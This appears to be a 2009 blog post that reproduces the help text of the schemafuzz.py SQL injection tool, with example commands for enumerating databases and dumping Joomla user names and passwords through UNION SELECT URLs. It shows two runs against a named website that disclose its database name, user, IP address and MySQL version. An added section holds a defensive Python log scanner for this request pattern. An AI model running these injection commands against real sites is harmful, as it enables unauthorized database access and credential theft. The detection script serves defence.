Wednesday, May 27, 2009

schemafuzz.py by rsauron

schemafuzz.py -h
Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"


schemafuzz.py -u http://www.ayamitiklembu/news.php?id=1 --findcol

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://www.ayamitiklembu/news.php?id=1--
[+] Evasion Used: "+" "--"
[+] 23:35:53
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.ayamitiklembu/news...+0,1,2,3--
[+] darkc0de URL: http://www.ayamitiklembu/news...rkc0de,2,3

[-] Done!

schemafuzz.py -u http://www.ayamitiklembu/news...rkc0de,2,3 --fuzz

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://www.ayamitiklembu/news...c0de,2,3--
[+] Evasion Used: "+" "--"
[+] 23:43:22
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web27-gc
User: web27-gc@79.170.40.171
Version: 5.0.77-community
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249

[+] Searching for tables and columns...

Reference:
http://www.hackforums.net/showthread.php?tid=79972
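
Added example, not part of the original post or of schemafuzz.py: a log check for the request pattern in the runs above, where one client sends UNION SELECT lists of growing width (the --findcol step) and then a request carrying the darkc0de marker string. The access-log lines, the IP addresses and the names scan() and normalise() are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not from the page); IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.20 - - [27/May/2009:23:30:01 +0000] "GET /news.php?id=22 HTTP/1.1" 200 5120
203.0.113.20 - - [27/May/2009:23:30:09 +0000] "GET /search.php?q=student+union+elections HTTP/1.1" 200 734
198.51.100.7 - - [27/May/2009:23:35:53 +0000] "GET /news.php?id=-1+union+select+0-- HTTP/1.1" 200 412
198.51.100.7 - - [27/May/2009:23:35:53 +0000] "GET /news.php?id=-1+union+select+0,1-- HTTP/1.1" 200 412
198.51.100.7 - - [27/May/2009:23:35:54 +0000] "GET /news.php?id=-1+union+select+0,1,2-- HTTP/1.1" 200 412
198.51.100.7 - - [27/May/2009:23:35:54 +0000] "GET /news.php?id=-1%20UNION/**/SELECT%200,1,2,3/* HTTP/1.1" 200 5120
198.51.100.7 - - [27/May/2009:23:43:22 +0000] "GET /news.php?id=-1+union+select+0,darkc0de,2,3-- HTTP/1.1" 200 5131
"""

REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# The select list ends at "--", "#", an unterminated "/*" or the end of the query.
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.+?)(?:--|#|/\*|$)", re.I | re.S)

def normalise(query):
    """URL-decode ('+' and %20 become spaces) and turn /**/ padding into a space."""
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(query))

def scan(log_text, marker="darkc0de"):
    """Return {client_ip: {"counts": [select-list widths], "flags": {reasons}}}."""
    hits = defaultdict(lambda: {"counts": set(), "flags": set()})
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = normalise(urlsplit(target).query)
        u = UNION.search(query)
        if not u:
            continue  # e.g. "student union elections" has no SELECT after UNION
        entry = hits[ip]
        entry["flags"].add("union_select")
        # Naive width: commas + 1 (commas inside function calls would be miscounted).
        entry["counts"].add(u.group(1).count(",") + 1)
        if marker in query.lower():
            entry["flags"].add("marker")
    for entry in hits.values():
        c = sorted(entry["counts"])
        # Three or more consecutive widths from one client looks like column counting.
        if len(c) >= 3 and c == list(range(c[0], c[0] + len(c))):
            entry["flags"].add("column_probe")
        entry["counts"] = c
    return dict(hits)
```
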
